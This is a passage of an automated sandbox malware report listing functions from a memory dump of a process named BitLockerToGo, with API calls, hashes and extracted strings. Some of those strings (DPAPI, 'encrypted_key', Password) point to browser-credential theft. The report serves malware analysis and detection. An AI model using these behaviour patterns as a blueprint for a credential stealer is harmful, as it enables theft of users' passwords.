                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: HttpInternetOpenRequest$ConnectSendstrtok
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 1208788097-1526165396
                                    • Opcode ID: fa9b6cef1a2067ef51dc4b454eb1e928d7e80ca78ad3ffe19ad799d428f038d4
                                    • Instruction ID: 503103f778717a32fcd270f6dccbbe0e4153b3d62c3e9adaa9add538531bbab0
                                    • Opcode Fuzzy Hash: fa9b6cef1a2067ef51dc4b454eb1e928d7e80ca78ad3ffe19ad799d428f038d4
                                    • Instruction Fuzzy Hash: 7E5100B8A12208DFCB18FF64DD95EED7779AF90200F508018E9066F598EF706B05CB61
                                    Function 0306AD4C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __lock.LIBCMT ref: 0306AD5A
                                      • Part of subcall function 0306A97C: __mtinitlocknum.LIBCMT ref: 0306A992
                                      • Part of subcall function 0306A97C: __amsg_exit.LIBCMT ref: 0306A99E
                                      • Part of subcall function 0306A97C: EnterCriticalSection.KERNEL32(?,?,?,0306A630,0000000E,0307A088,0000000C,0306A5FA), ref: 0306A9A6
                                    • DecodePointer.KERNEL32(0307A0C8,00000020,0306AE9D,?,00000001,00000000,?,0306AEBF,000000FF,?,0306A9A3,00000011,?,?,0306A630,0000000E), ref: 0306AD96
                                    • DecodePointer.KERNEL32(?,0306AEBF,000000FF,?,0306A9A3,00000011,?,?,0306A630,0000000E,0307A088,0000000C,0306A5FA), ref: 0306ADA7
                                      • Part of subcall function 0306B7F5: EncodePointer.KERNEL32(00000000,0306BA52,0307BDB8,00000314,00000000,?,?,?,?,?,0306B0C8,0307BDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0306B7F7
                                    • DecodePointer.KERNEL32(-00000004,?,0306AEBF,000000FF,?,0306A9A3,00000011,?,?,0306A630,0000000E,0307A088,0000000C,0306A5FA), ref: 0306ADCD
                                    • DecodePointer.KERNEL32(?,0306AEBF,000000FF,?,0306A9A3,00000011,?,?,0306A630,0000000E,0307A088,0000000C,0306A5FA), ref: 0306ADE0
                                    • DecodePointer.KERNEL32(?,0306AEBF,000000FF,?,0306A9A3,00000011,?,?,0306A630,0000000E,0307A088,0000000C,0306A5FA), ref: 0306ADEA
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                    • String ID:
                                    • API String ID: 2005412495-0
                                    • Opcode ID: 5bd1388f80e04756f9027680f3c882a7c50a082a73c846b72ec5d4d04d98d078
                                    • Instruction ID: c3c158f129e6f6aba23daaa97f7bfb537715b468e85ca1cb6b056c061e056833
                                    • Opcode Fuzzy Hash: 5bd1388f80e04756f9027680f3c882a7c50a082a73c846b72ec5d4d04d98d078
                                    • Instruction Fuzzy Hash: 303128B4E02309DFDF50FFA9D8447DEBAF4BB48221F14802AD511BA248DBB88945CF65
                                    Function 0306C3CD Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 0306C3D9
                                      • Part of subcall function 0306B95F: __getptd_noexit.LIBCMT ref: 0306B962
                                      • Part of subcall function 0306B95F: __amsg_exit.LIBCMT ref: 0306B96F
                                    • __amsg_exit.LIBCMT ref: 0306C3F9
                                    • __lock.LIBCMT ref: 0306C409
                                    • InterlockedDecrement.KERNEL32(?), ref: 0306C426
                                    • free.MSVCRT(?,?,?,00000003,0306B5E0,0307A108,00000008), ref: 0306C439
                                    • InterlockedIncrement.KERNEL32(0307B558), ref: 0306C451
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                    • String ID:
                                    • API String ID: 634100517-0
                                    • Opcode ID: 86c6c7a5c1e49ffbd69aee8fa44f4ef9d1ed6477f13176d40281ff9c1ea0d592
                                    • Instruction ID: 6ce81638827312ce0557056b2e1a9e9271ce6ae2b8cde3562a2a8fe6d2caea23
                                    • Opcode Fuzzy Hash: 86c6c7a5c1e49ffbd69aee8fa44f4ef9d1ed6477f13176d40281ff9c1ea0d592
                                    • Instruction Fuzzy Hash: 0701D635E03B219BF761FB6990447AEB7E0BF84710F094049D855BB64CCB38A841CBE1
                                    Function 030669A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strlen.MSVCRT ref: 030669BF
                                    • ??_U@YAPAXI@Z.MSVCRT ref: 030669ED
                                      • Part of subcall function 03066670: strlen.MSVCRT ref: 03066681
                                      • Part of subcall function 03066670: strlen.MSVCRT ref: 030666A5
                                    • VirtualQueryEx.KERNEL32(03066DAD,00000000,?,0000001C), ref: 03066A32
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 03066B53
                                      • Part of subcall function 03066880: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 03066898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                    • String ID: @
                                    • API String ID: 2950663791-2766056989
                                    • Opcode ID: d1676e09a3e437229ae1b3ee0748de699b719971dd61fba150f5e45f2d5557fb
                                    • Instruction ID: 1938fd2b153cc828890661fd0ccb6d0a8d9a09d8cda3337d65695a2ecf93abe2
                                    • Opcode Fuzzy Hash: d1676e09a3e437229ae1b3ee0748de699b719971dd61fba150f5e45f2d5557fb
                                    • Instruction Fuzzy Hash: 9751F6B5E0510DEBDB04CF98D981AEFB7B6FB88300F048519E915A7248D735AA51CBA1
                                    Function 0306C131 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 0306C13D
                                      • Part of subcall function 0306B95F: __getptd_noexit.LIBCMT ref: 0306B962
                                      • Part of subcall function 0306B95F: __amsg_exit.LIBCMT ref: 0306B96F
                                    • __getptd.LIBCMT ref: 0306C154
                                    • __amsg_exit.LIBCMT ref: 0306C162
                                    • __lock.LIBCMT ref: 0306C172
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0306C186
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    • Opcode ID: 60020492dc4becc8406b4819c2fc635f4f5f8858f36af12cf7f80943f5b245bf
                                    • Instruction ID: 77f7f1b0683a677c90f624c7b00e3e80a51328cea236ec7eee5b881fee200e83
                                    • Opcode Fuzzy Hash: 60020492dc4becc8406b4819c2fc635f4f5f8858f36af12cf7f80943f5b245bf
                                    • Instruction Fuzzy Hash: 75F09076E877109BF761FB6D940178E73906F82720F194149D094BE2D9CB6495408B65
                                    Function 03067BA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID: %d MB$@
                                    • API String ID: 3732870572-3474575989
                                    • Opcode ID: 97585073db8602e3d42aaaf5063cd20bc891fa78db0847f91848acdf2e6b21e1
                                    • Instruction ID: d0a084c4e963a18ed96efe2152e215147d6504704f2c96c8dceaf3b9622f873d
                                    • Opcode Fuzzy Hash: 97585073db8602e3d42aaaf5063cd20bc891fa78db0847f91848acdf2e6b21e1
                                    • Instruction Fuzzy Hash: 1D215CB1E44318ABDB00DFD9DC49FAEB7B8FB44B14F108509F615BB284C77859008BA8
                                    Function 03059E60 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 115COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memcmpmemset
                                    • String ID: @$v10
                                    • API String ID: 1065087418-24753345
                                    • Opcode ID: b2a52e949615cecbf292f7fe428a1f47d7068d5bdee8a8567b5fcccf7a40bf2d
                                    • Instruction ID: 828fdbb8e2f45ea26856fc9bd4f6de6038815bf98e705dc3fcd94ceaa58b7513
                                    • Opcode Fuzzy Hash: b2a52e949615cecbf292f7fe428a1f47d7068d5bdee8a8567b5fcccf7a40bf2d
                                    • Instruction Fuzzy Hash: 7941C475A05208EFDB08EF98CC95BEEB7B5BF44304F048518F905AF288DB74AA45CB94
                                    Function 03059D30 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • memcmp.MSVCRT ref: 03059DE2
                                      • Part of subcall function 03059BB0: memcpy.MSVCRT ref: 03059C16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memcmpmemcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 1784268899-738592651
                                    • Opcode ID: ddcd8a1e8dbe2b8a33ebad68cdfcf70256b81c3ee9835e540a7ddf1a9f56695e
                                    • Instruction ID: 282ccc1fd9e231a9760c472b9b0790a4360fc7fa363af2e2d51ed49618561faf
                                    • Opcode Fuzzy Hash: ddcd8a1e8dbe2b8a33ebad68cdfcf70256b81c3ee9835e540a7ddf1a9f56695e
                                    • Instruction Fuzzy Hash: 86314FB5D51208EBDF04EFE4DD45EEFB7B8BF48200F444518E901AB245E730AA15CBA1
                                    Function 03057310 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 03057354
                                    • task.LIBCPMTD ref: 03057595
                                      • Part of subcall function 03059290: vsprintf_s.MSVCRT ref: 030592AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memsettaskvsprintf_s
                                    • String ID: Password
                                    • API String ID: 2675463923-3434357891
                                    • Opcode ID: ba944540092b9ee5c545e35c7edf1560150219fd07302ffe50f48f3d8c3c856c
                                    • Instruction ID: bf1473df144fc020d661b0d3c7037459e12850647d4bfe813f7b91065f535b83
                                    • Opcode Fuzzy Hash: ba944540092b9ee5c545e35c7edf1560150219fd07302ffe50f48f3d8c3c856c
                                    • Instruction Fuzzy Hash: 5D61FDB59012689BDB24DF50DC44BDAB7BCBF84700F0085E9EA49A6145EBB06BC5CF91